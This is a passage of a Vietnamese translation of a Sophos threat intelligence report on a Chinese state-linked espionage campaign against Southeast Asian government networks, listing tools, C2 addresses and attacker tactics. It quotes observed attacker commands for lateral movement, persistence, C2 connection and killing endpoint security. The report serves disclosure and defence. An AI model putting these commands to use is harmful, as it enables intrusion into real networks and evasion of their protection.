Chiến dịch gián điệp mạng của Trung Quốc tiếp tục nỗ lực trong nhiều tổ chức ở Đông Nam Á, kết hợp các chiến thuật và mở rộng nỗ lực
Được viết bởi Mark Parsons , Morgan Demboski , Sean Gallagher
Sau một thời gian ngắn tạm ngừng hoạt động, Sophos X-Ops tiếp tục theo dõi và ứng phó với những gì chúng tôi đánh giá với độ tin cậy cao là một hoạt động gián điệp mạng do nhà nước Trung Quốc chỉ đạo nhắm vào một cơ quan quan trọng trong chính phủ của một quốc gia Đông Nam Á.
Trong quá trình điều tra hoạt động đó, mà chúng tôi theo dõi là Chiến dịch Crimson Palace, Sophos Managed Detection and Response (MDR) đã tìm thấy dữ liệu đo từ xa cho thấy sự xâm phạm của các tổ chức chính phủ khác trong khu vực và đã phát hiện ra hoạt động liên quan từ các cụm đe dọa hiện có này trong các tổ chức khác trong cùng khu vực. Những kẻ tấn công liên tục sử dụng các mạng lưới dịch vụ công và tổ chức bị xâm phạm khác trong khu vực đó để phân phối phần mềm độc hại và các công cụ dưới vỏ bọc là điểm truy cập đáng tin cậy.
Báo cáo trước đây của chúng tôi đề cập đến hoạt động từ ba cụm hoạt động đe dọa an ninh liên quan (STAC) có liên quan đến hoạt động gián điệp mạng: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870) và Cluster Charlie (STAC1305), tất cả đều được phát hiện trong khoảng thời gian từ tháng 3 đến tháng 8 năm 2023. Cả ba cụm đe dọa hoạt động bên trong cơ quan mục tiêu đều ngừng hoạt động vào tháng 8 năm 2023.
Tuy nhiên, Cluster Charlie đã tiếp tục hoạt động sau đó vài tuần. Hoạt động này, bao gồm một keylogger chưa được ghi chép trước đó mà chúng tôi đặt tên là “TattleTale”, đánh dấu sự khởi đầu của giai đoạn thứ hai và mở rộng hoạt động xâm nhập trên toàn khu vực, vẫn đang tiếp diễn.
Sophos MDR cũng quan sát thấy một loạt các phát hiện phù hợp với công cụ được Cluster Bravo sử dụng tại các thực thể bên ngoài cơ quan chính phủ được đề cập trong báo cáo ban đầu của chúng tôi, bao gồm hai tổ chức dịch vụ công phi chính phủ và nhiều tổ chức khác, tất cả đều có trụ sở tại cùng một khu vực. Các phát hiện đó bao gồm phép đo từ xa cho thấy việc sử dụng hệ thống của một tổ chức làm điểm chuyển tiếp C2 và là nơi tập trung các công cụ, cũng như việc tập trung phần mềm độc hại trên máy chủ Microsoft Exchange bị xâm phạm của một tổ chức khác.
Cluster Bravo, mở rộng
Trong khi Cluster Bravo chỉ hoạt động trong thời gian ngắn trên mạng của tổ chức được đề cập trong báo cáo đầu tiên của chúng tôi, Sophos X-Ops sau đó đã phát hiện hoạt động liên quan đến Cluster Bravo trên mạng của ít nhất 11 tổ chức và cơ quan khác trong cùng khu vực. Ngoài ra, Sophos đã xác định được nhiều tổ chức có cơ sở hạ tầng được sử dụng để dàn dựng phần mềm độc hại bao gồm một cơ quan chính phủ. Các tác nhân đe dọa đã chính xác trong cách chúng tận dụng các môi trường bị xâm phạm này để lưu trữ, đảm bảo luôn sử dụng một tổ chức bị nhiễm trong cùng một ngành dọc cho các cuộc tấn công của chúng.
Hoạt động mới này kéo dài từ tháng 1 đến tháng 6 năm 2024 và bao gồm hai tổ chức tư nhân có vai trò liên quan đến chính phủ. Các tổ chức bị ảnh hưởng đại diện cho một loạt các chức năng quan trọng của chính phủ mục tiêu.
Cluster Charlie, đổi mới
Cluster Charlie đã im lặng vào tháng 8 năm 2023 sau khi Sophos chặn các cấy ghép C2 tùy chỉnh (PocoProxy) . Tuy nhiên, những kẻ đứng sau vụ xâm nhập cuối cùng đã quay trở lại với các kỹ thuật mới vào cuối tháng 9.
Điều này bắt đầu bằng những nỗ lực trốn tránh các khối bằng cách chuyển sang các kênh C2 khác nhau và với việc diễn viên Cluster Charlie thay đổi cách triển khai các bản cấy ghép. Những thay đổi này bao gồm, như chúng tôi đã lưu ý trong báo cáo trước, sử dụng trình tải phần mềm độc hại tùy chỉnh có tên là HUI loader (do Sentinel Labs xác định) để đưa một đèn hiệu Cobalt Strike vào tiện ích Máy tính từ xa mstsc.exe.
Tuy nhiên, vào tháng 9, những kẻ tấn công đứng sau Cluster Charlie đã thay đổi hoạt động của chúng theo nhiều cách:
- Họ sử dụng các công cụ mã nguồn mở và có sẵn để thiết lập lại sự hiện diện của mình sau khi Sophos phát hiện và chặn các công cụ tùy chỉnh của họ.
- Họ đã tận dụng nhiều công cụ và kỹ thuật vốn là một phần của các nhóm hoạt động đe dọa khác mà chúng tôi đã quan sát.
Việc rò rỉ dữ liệu có giá trị tình báo vẫn là mục tiêu sau khi hoạt động trở lại. Tuy nhiên, phần lớn nỗ lực của họ dường như tập trung vào việc thiết lập lại và mở rộng chỗ đứng của họ trên mạng mục tiêu bằng cách bỏ qua phần mềm EDR và nhanh chóng thiết lập lại quyền truy cập khi các thiết bị cấy ghép C2 của họ đã bị chặn.
Từ tháng 9 năm 2023 trở đi: Web shell và các công cụ nguồn mở
Với các công cụ C2 của họ bị Sophos chặn, những kẻ tấn công đã áp dụng một cách tiếp cận mới. Sử dụng thông tin xác thực đã đánh cắp trước đó, những kẻ tấn công đã triển khai một web shell tới một máy chủ ứng dụng web bằng tính năng tải tệp tích hợp của nó. Kẻ tấn công đã thực hiện một cuộc điều tra có phương pháp về tệp cấu hình của máy chủ ứng dụng web và các thư mục ảo để xác định vị trí DLL của ứng dụng web. Sau đó, chúng sử dụng web shell để thực thi các lệnh trên máy chủ ứng dụng web mục tiêu. Điều này bao gồm sao chép thư viện liên kết động (DLL) của ứng dụng vào một thư mục tài liệu web và ngụy trang nó thành PDF để cho phép nó được truy xuất thông qua ứng dụng, sử dụng thông tin xác thực trước đó được liên kết với hoạt động của Cluster Charlie.
Mọi hoạt động trinh sát và thu thập này diễn ra trong một khoảng thời gian cực kỳ ngắn—dưới 45 phút.
Họ đã quay lại máy chủ ứng dụng web bị xâm phạm vào tháng 11, sử dụng web shell để triển khai khung Havoc C2 nguồn mở nhằm hỗ trợ hoạt động do thám. Máy chủ này đã ngoại tuyến ngay sau đó và chúng tôi không thể thu thập thêm dữ liệu từ xa về hoạt động của những kẻ tấn công. Tuy nhiên, Sophos MDR sau đó đã tìm thấy cùng một ứng dụng web bị khai thác trên các máy chủ khác. Trong vài tháng tiếp theo, tác nhân đe dọa Cluster Charlie sẽ thường xuyên triển khai web shell trên các máy chủ khác trên toàn bộ mạng mục tiêu trước khi tải xuống các tải trọng Havoc.
Ví dụ, vào tháng 11, những kẻ tấn công đã sử dụng công cụ Havoc để đưa mã vào các quy trình khác, sau đó triển khai công cụ SharpHound nguồn mở để lập bản đồ cơ sở hạ tầng Active Directory.
Hoạt động này cho thấy sự quan tâm liên tục của các tác nhân đằng sau Cluster Charlie trong việc lập bản đồ địa hình cơ sở hạ tầng của môi trường từ nhiều góc nhìn. Vào tháng 6 năm 2023, Cluster Charlie đã thực hiện một lần chụp chuyên sâu các sự kiện đăng nhập thành công của tổ chức mục tiêu (ID sự kiện 4624) thông qua các lệnh PowerShell. Họ tiếp tục thực hiện quét ping các địa chỉ IP được liên kết với vị trí của các lần đăng nhập thành công đó, lập bản đồ người dùng của tổ chức với không gian địa chỉ IP của mạng. Việc sử dụng SharpHound sẽ cung cấp thêm kiến thức về cấu trúc của tổ chức, bao gồm thông tin chi tiết về các quyền trong miền được chỉ định cho những người dùng được lập bản đồ này.
Chúng tôi tiếp tục thấy những kẻ đe dọa chuyển sang các công cụ nguồn mở khi công cụ của chúng để trốn tránh C2 hoặc MDR đã thất bại trong giai đoạn hoạt động thứ hai này. Các công cụ có sẵn và nguồn mở bao gồm:
| Tool | Application | Timeframe |
| Cobalt Strike | C2 | Aug.-Sep. 2023 Dec. 2023 Feb.-Mar. 2024 |
| Havoc | C2 | Sep. 2023 – Jun. 2024 |
| Atexec | C2/ Lateral Movement | Oct.-Nov. 2023 |
| SharpHound | Reconnaissance | Nov. 2023 |
| Impacket | Lateral movement | Apr. 2024 |
| Donut | Shellcode loader | Feb.-Mar. 2024 |
| XiebroC2 | C2 | Feb. 2024 |
| Alcatraz | EDR Evasion | Feb.-Jun. 2024 |
| Cloudflared tunnel | C2 | Jun. 2024 |
| RealBlindingEDR | EDR Evasion | Jan.-Mar. 2024 |
| ExecIT | Shellcode loader | Mar. 2024 |
Tháng 10 và tháng 11 năm 2023: Sự giao thoa của các chiến thuật
Giống như những quan sát trước đây của chúng tôi, những kẻ đứng sau làn sóng hoạt động mới này chủ yếu dựa vào việc tải DLL, sử dụng thư viện liên kết động độc hại với tên hàm trùng khớp với tên hàm được sử dụng bởi các tệp thực thi hợp pháp, đã ký và đặt chúng vào một thư mục nơi chúng sẽ được tìm thấy và tải bởi các tệp thực thi đó. Chúng tôi cũng thấy những kẻ này sử dụng các chiến thuật mà chúng tôi đã quan sát trước đây như một phần của các nhóm hoạt động đe dọa khác, củng cố đánh giá của chúng tôi rằng tất cả các hoạt động trước đó đều được dàn dựng bởi cùng một tổ chức bao quát.
Vào tháng 10, Cluster Charlie đã được quan sát thấy triển khai thêm công cụ C2 bằng cách sử dụng DLL hijacking để lạm dụng phần mềm hợp pháp do người điều hành tải xuống để tạo tệp thực thi dễ bị tấn công có thể sử dụng. Những kẻ tấn công đã sử dụng thông tin xác thực thu được từ một thiết bị không được quản lý, sau đó sử dụng thiết bị không được quản lý đó để khởi chạy một cuộc tấn công từ xa vào một hệ thống mục tiêu bằng cách sử dụng mô-đun Impacket atexec—một chiến thuật được sử dụng như một phần của hoạt động Cluster Alpha mà chúng tôi đã quan sát thấy trong hoạt động được đề cập trong báo cáo trước đây của chúng tôi .
Mô-đun atexec được sử dụng để cấu hình từ xa một tác vụ theo lịch trình trên hệ thống mục tiêu. Tác vụ đó đã thực thi Platinum Watch Dog (ptWatchDog.exe) của Trend Micro với phiên bản độc hại được tải phụ của công cụ DLL tmpblglog.dll; công cụ này được sử dụng để ping một địa chỉ IP do một công ty viễn thông trong nước lưu trữ. Vì atexec được chạy từ một thiết bị không được quản lý, chúng tôi chỉ có thể xác định nó bằng phép đo từ xa và không thể thu thập được mẫu nào.
Một tuần sau, Sophos quan sát thấy tác nhân kết nối đến cùng một địa chỉ IP tại công ty viễn thông từ một thiết bị khác trên mạng của nạn nhân, sử dụng kết hợp tải phụ DLL thay thế. Trong trường hợp này, kẻ tấn công triển khai một bản sao của thành phần Windows .NET framework hợp lệ, mscorsvw.exe, nằm trong thư mục C:\Windows\Help\Help để tải phụ tải độc hại (mscorsvc.dll) và tạo kết nối mạng đến cùng một công ty viễn thông trên cổng TCP 443.
Trong các kết nối mạng này, Sophos đã quan sát thấy việc tạo ra một khóa xác thực máy mới. Điều này cho thấy rằng tác nhân đe dọa đã cố gắng RDP từ một thiết bị bên ngoài môi trường của tổ chức mục tiêu. Việc điều tra IP từ xa thông qua công cụ tìm kiếm lỗ hổng Shodan đã tìm thấy một màn hình xác thực người dùng máy chủ RDP mở trên thiết bị từ xa đó. Những kẻ tấn công liên tục sử dụng các mạng bị xâm phạm khác trong khu vực của tổ chức để di chuyển ngang trong mạng.
Vào ngày 3 tháng 11, Sophos MDR một lần nữa quan sát thấy các tác nhân sử dụng atexec từ một thiết bị không được quản lý trên mạng để thực thi tệp độc hại (C:\ProgramData\mios.exe) trên một hệ thống mục tiêu để tạo ra các thông tin liên lạc nội bộ và bên ngoài:
- Truyền thông nội bộ: C:\Windows\system32\cmd.exe /C “c:\programdata\mios.exe 172.xx.xxx.xx 65211”
- Truyền thông bên ngoài: c:\programdata\mios.exe 178.128.221.202 443 (Digital Ocean, Singapore)
Sophos không thể lấy được mẫu của tệp thực thi độc hại này.
Tháng 11 và tháng 12 năm 2023, phần 1: Chiếm đoạt dịch vụ
Cũng trong tháng 11, chúng tôi đã quan sát thấy tác nhân đe dọa tìm kiếm nhiều dịch vụ mà chúng có thể khai thác để tải DLL, sau đó là chiếm đoạt DLL của các dịch vụ hiện có để thiết lập một cửa hậu tùy chỉnh. Bước đầu tiên của chúng là sử dụng tiện ích Service Control của Microsoft (sc.exe) để thu thập thông tin về các dịch vụ mà chúng có thể sử dụng để lưu trữ DLL độc hại:
sc query diagtrack
sc query appmgmt
sc query AxInstSV
sc query swprv
Trong trường hợp này, sau đó, tác nhân đã thay thế DLL Volume Shadow Copy Service hợp lệ (C:\System32\swprv.dll) bằng payload độc hại của riêng chúng, làm lu mờ thêm quá trình triển khai của chúng. Chúng đã làm điều này bằng cách sử dụng một tài khoản quản trị bị xâm phạm để sửa đổi các quyền trên DLL hiện có từ File Explorer, trước khi di chuyển bản sao (độc hại) của riêng chúng vào thư mục \System32.
Sophos MDR đã quan sát thấy hoạt động tương tự vào tháng 12 năm 2022 trong một vụ xâm phạm trước đó của cơ quan này được phát hiện khi bảo vệ điểm cuối Sophos ban đầu được triển khai trên mạng của cơ quan này. Các hiện vật của hoạt động đó cho thấy kẻ tấn công đã tận dụng khâu DLL để tạo ra hai DLL lớn (swprvs.dll và appmgmt.dll).
Khi thực hiện Dịch vụ sao chép bóng từ svchost.exe, swprv.dll độc hại được phát hiện thực hiện nhiều yêu cầu DNS và kết nối mạng tới các miền và địa chỉ IP sau:
- 103.19.16.248:443 // dmsz.org (nằm ở Philippines)
- 103.56.5.224:443 // cancelle.net (có vị trí địa lý tại Philippines)
- 49.157.28.114:443 // gandeste.net (nằm ở Philippines)
Vào tháng 12, các tác nhân đã sử dụng kỹ thuật sideloading này để chạy phần mềm độc hại giao tiếp với địa chỉ IP 123.253.35.100 (được định vị địa lý tại Malaysia), thông qua quy trình trình duyệt Internet Explorer iexplore.exe. Theo phân tích từ SophosLabs, DLL được thiết kế để thay đổi cài đặt proxy tường lửa và được quan sát thấy đang tạo một shell lệnh để hoàn tất quá trình khám phá. DLL chứa một chuỗi đáng ngờ dường như tiết lộ đường dẫn tệp trên máy tính phát triển của người tạo phần mềm độc hại (E:\Masol_https190228\x64\Release\Masol.pdb).
Trong một ví dụ về các cuộc tấn công tương tự nhưng khác biệt, trong khi cả Cluster Charlie và Cluster Alpha đều chọn triển khai một số phần tải trọng của chúng bằng cách sử dụng tải phụ Service DLL, dịch vụ mà Cluster Charlie nhắm tới, thì Volume Shadow Copy Service đã sử dụng các quyền gốc mà Cluster Alpha đã thêm vào dịch vụ IKEEXT (IKE và AuthIP IPsec Keying Modules) vào tháng 6 năm 2023, như đã mô tả trong Phần 1 Phân tích chuyên sâu về kỹ thuật của chúng tôi .
Tháng 11 và tháng 12 năm 2023, phần 2: Hành động né tránh, trốn tránh EDR và trinh sát sâu hơn
Vào giữa tháng 11, cùng một máy chủ ứng dụng web đã bị tấn công vào tháng 9 đã bị xâm phạm một lần nữa, với tác nhân đe dọa sử dụng thông tin đăng nhập bị đánh cắp từ một thiết bị không được quản lý và một web shell bị xóa. Những kẻ tấn công đã sử dụng shell để thực thi rundll32.exe, đưa một Havoc DLL độc hại (với phần mở rộng tệp được đổi thành .pdf) vào backgroundtaskhost.exe, một thành phần Windows chịu trách nhiệm thực thi trợ lý ảo Windows (Cortana):
rundll32 C:\inetpub\wwwroot\idocs_api\Temp\<REDACTED>DOC20231100001603KMAP.pdf,Start
DLL này đã gửi thông tin liên lạc C2 đến máy chủ C2 của kẻ tấn công (107.148.41.114, có vị trí địa lý tại Hoa Kỳ).
Tiếp theo, kẻ tấn công chạy lệnh sau để kiểm tra xem đăng nhập RDP có thành công không. Kẻ tấn công đang tìm kiếm Windows Event Logs cho Windows Remote Connection Manager event ID 1149:
/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational /rd:true /f:text /q:*[System[(EventID=1149)]] >> c:\windows\temp\1.txt
Truy vấn này sẽ trả về các sự kiện Windows báo hiệu việc thiết lập thành công phiên kết nối từ xa của Terminal Services. Sau đó, Havoc DLL đã gửi lệnh ping trở lại C2 của nó.
Tiếp theo, quy trình được tiêm sử dụng WMIC để truy vấn đường dẫn loại trừ của Windows Defender, điều này sẽ cung cấp cho chúng thông tin về những thư mục và loại tệp nào không được Defender quét—về mặt lý thuyết, những vị trí có thể được sử dụng để tránh bảo vệ khỏi phần mềm độc hại.
/c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference get ExclusionPath
Nó cũng truy vấn sổ đăng ký Sophos để hiểu rõ hơn các giá trị của Sổ đăng ký “PolicyConfiguration”, “threat policy” và “Poll Server”, cũng như sử dụng cmd.exe để truy vấn trạng thái “SophosHealthClient.exe”. Điều này tiết lộ cấu hình chính sách bảo mật cho điểm cuối, trạng thái bảo vệ Sophos trên thiết bị và URL mà phần mềm bảo vệ điểm cuối thăm dò để thay đổi cài đặt cấu hình. Khi kết thúc truy vấn, tác nhân đe dọa đã sử dụng lệnh sau để xác định các loại trừ, mục được phép và mục bị chặn trong cấu hình:
findstr /i /c:exclude /c:whitelist /c:blocklist
Dữ liệu máy chủ thăm dò có thể được phần mềm độc hại như EagerBee (như đã thấy trong hoạt động Cluster Alpha được ghi lại trong báo cáo gần đây nhất của chúng tôi ) sử dụng để chặn dữ liệu đo từ xa và cập nhật cho điểm cuối trong tương lai, mặc dù không có bằng chứng nào cho thấy điều đó xảy ra ở đây.
Cũng trong tháng 11, bằng cách sử dụng một tài khoản quản trị bị xâm phạm, những kẻ tấn công đã sử dụng phiên shell lệnh được tạo ra từ DLL độc hại để di chuyển ngang qua WMIC và triển khai công cụ SharpHound nguồn mở dưới dạng DLL để lập bản đồ cơ sở hạ tầng Active Directory.
/c wmic /node:172.xx.xxx.xxx/password:”<REDACTED>” /user:”<REDACTED>” process call create “cmd /c C:\Windows\syswow64\rundll32.exe C:\windows\syswow64\Windows.Data.Devices.Config.dll,Start”
Sau đó, kẻ tấn công sử dụng thông tin xác thực để truy cập vào một trong các chương trình quản lý siêu giám sát của tổ chức và tạo một tác vụ theo lịch trình, thực thi một DLL độc hại khác ngụy trang thành tệp .ini để kết nối với cùng một IP C2 bên ngoài như IP ngụy trang thành tệp PDF.
schtasks /create /tn \Microsoft\Windows\Clip2 /tr “rundll32 C:\programdata\vmnat\Test\log.ini,Start” /ru System /sc minute /mo 90 /f
Tác vụ theo lịch trình này cho phép kẻ tấn công thực hiện một bước chuyển khác từ trình quản lý ảo sang hệ thống khác để thực thi SharpHound, bằng cách sử dụng tài khoản quản trị trước đó được liên kết với Cluster Charlie.
/c schtasks /create /s 172.xx.xxx.xxx /p “<REDACTED>” /u “<REDACTED>” /tn \Microsoft\Windows\Clip2 /tr “C:\Windows\syswow64\rundll32.exe C:\windows\syswow64\Windows.Data.Devices.Config.dll,Start” /ru System /sc minute /mo 90 /f
Tháng 12 năm 2023: Thu thập và lọc
Vào tháng 12, những kẻ tấn công đã tiến hành một loạt các nỗ lực do thám và thu thập. Điều này bao gồm việc thu thập thông tin đăng nhập và dữ liệu của quản trị viên cho những người dùng cụ thể, cũng như ping các tài khoản người dùng và máy mà chúng tôi quan sát thấy những kẻ tấn công do thám trong hoạt động Cluster Charlie trước đó vào tháng 6 năm 2023. Trong thời gian này, những kẻ tấn công đã tiến hành hoạt động gián điệp có mục tiêu, trong đó chúng thu thập các tài liệu nhạy cảm, khóa cho cơ sở hạ tầng đám mây (bao gồm phục hồi sau thảm họa và sao lưu), các khóa và chứng chỉ xác thực quan trọng khác và dữ liệu cấu hình cho phần lớn cơ sở hạ tầng CNTT và mạng của cơ quan.
2024: Tăng tốc
Vào năm 2024, rõ ràng là các tác nhân đe dọa đã bắt đầu nhanh chóng luân chuyển qua các kênh C2 để duy trì và quản lý quyền truy cập liên tục khi Sophos phát hiện và chặn các cấy ghép C2 hiện có. Chúng cũng thay đổi cách triển khai các tải trọng độc hại. Từ tháng 11 năm 2023 đến ít nhất là tháng 5 năm 2024, các tác nhân trong Cluster Charlie đã triển khai các cấy ghép C2 bằng 28 tổ hợp duy nhất của chuỗi tải phụ, phương pháp thực thi và trình tải shellcode.
Có ba lý do khiến các diễn viên nhanh chóng luân chuyển kênh C2 và phương pháp triển khai của họ:
- Có bằng chứng cho thấy những kẻ tấn công đang thử nghiệm để xem liệu Sophos có phát hiện ra các tệp và phương pháp triển khai khác nhau hay không.
- Các kênh C2 xoay vòng nhanh chóng và phương pháp triển khai có thể khiến bên phòng thủ khó theo kịp và ngăn chặn hơn.
- Những kẻ tấn công đã phản hồi lại hành động chặn của chúng tôi, đôi khi thiết lập lại quyền truy cập trong vòng 24 giờ và triển khai một mẫu duy nhất đã được sửa đổi trong vòng chưa đầy bốn ngày để tránh bị phát hiện chặn.
Vào tháng 1, chúng tôi đã thấy thêm nhiều vụ thu thập có chủ đích các tài liệu của người dùng và cơ sở dữ liệu truyền thông Viber for Desktop, thu thập các cuộc trò chuyện nội bộ tại tổ chức. Những kẻ tấn công cũng đã thực hiện các biện pháp để vô hiệu hóa phần mềm bảo vệ điểm cuối hoặc trốn tránh phát hiện khi không thể vô hiệu hóa phần mềm.
Tháng 1 năm 2024: RealBlindingEDR
Vào tháng 1 năm 2024, Sophos MDR đã quan sát thấy các tác nhân triển khai hai mẫu RealBlindingEDR đã được sửa đổi đôi chút , một công cụ nguồn mở được thiết kế để “làm mù” (hoặc giết chết) các giải pháp bảo vệ phần mềm độc hại và phát hiện và phản hồi điểm cuối (EDR). Trớ trêu thay, các tác nhân đã sử dụng một sản phẩm bảo vệ phần mềm độc hại để thực thi trình diệt EDR nhằm tạo ra một chuỗi thực thi có vẻ “an toàn” đối với các công cụ bảo vệ phần mềm độc hại khác, tương tự như cách phần mềm độc hại “trình diệt EDR” trước đây đã sử dụng các thành phần Windows đáng tin cậy .
Để minh họa cách chuỗi tấn công trở nên phức tạp hơn, sau đây là cách kẻ tấn công phát hành tệp nhị phân RealBlindingEDR asoc.exe:.
Đầu tiên, kẻ tấn công chạy một tệp lệnh hàng loạt (33.bat) thực thi lệnh sau:
cd c:\ProgramData && c:\ProgramData\kaba.exe chạy run-cmd “c:\ProgramData\asoc.exe -cccc”
Lệnh này sử dụng kaba.exe, phiên bản đổi tên của tệp thực thi Kaspersky hợp lệ, để tải mẫu RealBlindingEDR, asoc.exe.
Sau khi thực thi, đầu tiên asoc.exe sẽ cố gắng kiểm tra xem trình điều khiển echo đã được tải chưa. Nếu chưa, nó sẽ cố gắng tải trình điều khiển ProgramData\mico.sys (phiên bản đổi tên của echo_driver.sys được triển khai như một phần của bộ công cụ RealBlindingEDR) và lấy xử lý của nó. Các tệp nhị phân khai thác lỗ hổng trong công cụ chống gian lận cho Minecraft có tên là Echo.ac (CVE-2023-38817) và sử dụng công cụ đó để xóa các thói quen hạt nhân được sử dụng bởi một số sản phẩm EDR khác nhau, cho phép các tác nhân leo thang đặc quyền của chúng thông qua hành vi trộm cắp mã thông báo. Echo.ac đã được triển khai trong trường hợp này và các trường hợp khác dưới dạng mico.sys. Sau đó, cuộc tấn công sử dụng cùng một kỹ thuật để xóa các lệnh gọi lại hạt nhân CmRegisterCallbacks và MiniFilterCallbacks, cả hai đều là các hàm hạt nhân mà nhiều sản phẩm EDR sử dụng để giám sát hoạt động của hệ thống.
Sau khi RealBlindingEDR xóa các chương trình kernel này khỏi bộ nhớ, nó sẽ dỡ tải trình điều khiển Echo.ac (mico.sys) và chạy
taskkill /IM SophosFileScanner.exe /F
để giết tiến trình SophosFileScanner.exe. Để báo hiệu thao tác thành công, các tệp nhị phân sẽ tạo một tệp trống trong C:\Users\Public\log.ini. Sự hiện diện của tệp này cho biết thành công.
Một mẫu RealBlindingEDR khác được phát hiện, ssoc.exe, có một khả năng bổ sung: Nó sử dụng một kỹ thuật đã biết để cố gắng làm sập các quy trình EDR, bằng cách tạo một khóa Registry có tên là SophosFileScanner.exe trong đường dẫn SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, và tạo một giá trị chuỗi có tên là MinimumStackCommitInBytes bên trong khóa đó.
Sophos cũng quan sát thấy nỗ lực của các tác nhân nhằm sử dụng một công cụ mã nguồn mở có tên là Alcatraz , đây là một trình mã hóa nhị phân x64. Từ tháng 2 đến tháng 5, công cụ này đã bị phát hiện (dưới dạng ATK/Alcatraz-D) tại vị trí C:\ProgramData\conhost.exe và bị Sophos ngăn không cho chạy trong bốn lần riêng biệt.
Tháng 2 năm 2024: Kiểm tra chiến thuật và công cụ
Sau khi Sophos mở rộng phạm vi phát hiện của khung Havoc C2, tác nhân đe dọa bắt đầu nhanh chóng tuần hoàn qua một số tùy chọn cấy ghép C2. Chúng triển khai khung XieBroC2 làm bản sao lưu. Đồng thời, các tác nhân dường như đang chế tạo lại cơ chế triển khai của chúng.
Một trong những cơ chế mà họ chuyển sang là Donut , một công cụ mã nguồn mở tạo ra các tập lệnh tiêm shellcode được thiết kế để tránh các công cụ bảo mật. Donut có thể tải một payload độc hại từ bộ nhớ và tiêm nó vào các quy trình Windows tùy ý. Các tác nhân đe dọa đã được quan sát thấy nhiều lần sử dụng trình tải dựa trên Donut để thả các cấy ghép C2, thường xuyên thả các biến thể của các cấy ghép trong vòng vài giờ trên các máy chủ khác nhau.
Vào ngày 1 tháng 2, các diễn viên dường như đã tiến hành một hình thức thử nghiệm A/B phần mềm độc hại, triển khai hai DLL độc hại khác nhau có cùng tên (msntlm.dll) trong vòng hai giờ sau mỗi lần. Cả hai DLL đều liên hệ với cùng một địa chỉ C2 ( 141.136.44.219, có vị trí địa lý tại Síp) tại tên miền gsenergyspeedtest.com, trùng khớp với mẫu đặt tên miền được nhóm phụ Earth Longzhi và Cluster Charlie của APT 41 sử dụng trong hoạt động trước đó.
Cả hai DLL phần mềm độc hại đều là trình tải shellcode Donut. Một trong các mẫu đã giải mã và đưa Havoc Shellcode Dropper vào svchost.exe, sau đó đưa một payload Havoc nhúng vào bộ nhớ và thực thi payload đó. Mẫu còn lại đã giải mã một Havoc Shellcode Injector đưa một Cobalt Strike Reflective Loader vào svchost.exe.
Vào một dịp khác, 27 ngày sau lần thử nghiệm A/B ban đầu, chúng tôi đã quan sát thấy các tác nhân tải hai phiên bản của một tệp độc hại (libcef.dll) bằng cách lạm dụng Java Chromium Embedded Framework Helper hợp pháp (jcef_helper.exe). Một mẫu libcef.dll đã triển khai XiebroC2 thông qua shellcode từ Donut (kết nối đến 64.176.50.42:8444, được định vị địa lý tại Hoa Kỳ) , trong khi mẫu còn lại triển khai một tải trọng Havoc được mã hóa được nhúng trong đó, khi giải mã sẽ tiếp cận đến IP của kẻ tấn công là 141.136.44.219 — cùng một địa chỉ C2 tại Síp được sử dụng trong sự cố ngày 1 tháng 2.
Tổng cộng, trong tháng 2 và tháng 3 năm 2024, chúng tôi đã chứng kiến bảy lần triển khai libcef.dll sử dụng jcef_helper.exe, trong một số trường hợp được đổi tên thành C:\PerfLogs\conhost.exe và trong những trường hợp khác không đổi tên.
Tháng 2 và tháng 3 năm 2024: Mang theo người trợ giúp
Nhiều lần, những kẻ tấn công đã mang theo một tệp thực thi dễ bị tấn công để tải các tệp DLL độc hại. Vào tháng 2, chúng đã mang theo tệp độc hại c:\perflogs\wsoc.exe và di chuyển tệp này trong môi trường mục tiêu để tạo các quy trình tiêm mã độc. SophosLabs xác định wsoc.exe hoạt động bằng cách tạo một phiên bản của Microsoft WMI Provider Subsystem Host để chạy WmiPrvse để sau đó có thể tiêm mã độc vào đó. Trong trường hợp này, chúng đã tiêm libcef.dll vào WMIPrvSe.exe như một lớp che giấu khác. Các lệnh này dường như là một hình thức thử nghiệm của kẻ tấn công.
Vào tháng 3, những kẻ tấn công đã thực hiện thêm các điều chỉnh đối với các bản cấy ghép. Vào đầu tháng 3, tác nhân đã tận dụng jconsole.exe để tải tệp DLL độc hại jli.dll (tên thực tế: ExecIT.dll , trình tải mã shell ExecIT). Sau khi tác nhân tải tệp ExecIT, tệp sẽ kiểm tra sự hiện diện của tệp log.ini trong cùng thư mục trước khi đọc tệp log.ini và đưa tệp này vào bộ nhớ của nó. Theo phân tích của Sophos X-Ops, jli.dll cũng kiểm tra các trình gỡ lỗi khác nhau (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger hoặc IMMUNITYDEBUGGER.EXE) và các công cụ giám sát và phân tích khác nhau (Unpacked.exe, reshacker.exe và các công cụ khác).
Những kẻ tấn công đã thả DLL được tải bên ngoài thông qua chuyển động ngang từ một thiết bị bị xâm phạm khác và phát hiện ra rằng cấy ghép tạo ra các kết nối mạng ra ngoài đến 198.13.47.158:443 (được định vị địa lý tại Nhật Bản). Địa chỉ IP này đã được các tác nhân đe dọa Cluster Charlie sử dụng trước đó vào tháng 3 năm 2023 làm C2 cho mẫu cửa hậu PocoProxy.
Tác nhân đe dọa di chuyển theo chiều ngang bằng cách sao chép các tệp jconsole.exe, jli.dll và log.ini, sau đó tạo một tác vụ theo lịch trình từ xa để thực thi tải trọng trên các máy mục tiêu. Jconsole.exe được quan sát thấy tạo ra 131 lệnh khám phá, di chuyển theo chiều ngang và xóa chỉ báo khác nhau. Ngay sau đó, tiến trình jconsole.exe độc hại được thực thi từ tác vụ theo lịch trình từ xa và tạo kết nối IP trực tiếp đến 198.13.47.158:443.
Những kẻ tấn công đã chuyển sang trình tải shellcode Donut một lần nữa vào ngày 11 tháng 3, một lần nữa lạm dụng jcef_helper.exe để tải một bản sao Havoc C2 (libcef.dll) cùng với tệp log.bin. Tệp log.bin đóng vai trò là trình kích hoạt cho bản sao; shellcode chỉ đưa bản sao vào và tạo kết nối đến C2 của tác nhân (IP 45.77.46.245:443, định vị địa lý tại Singapore) khi log.bin có mặt.
Tháng 4 năm 2024: Triển khai tin đồn
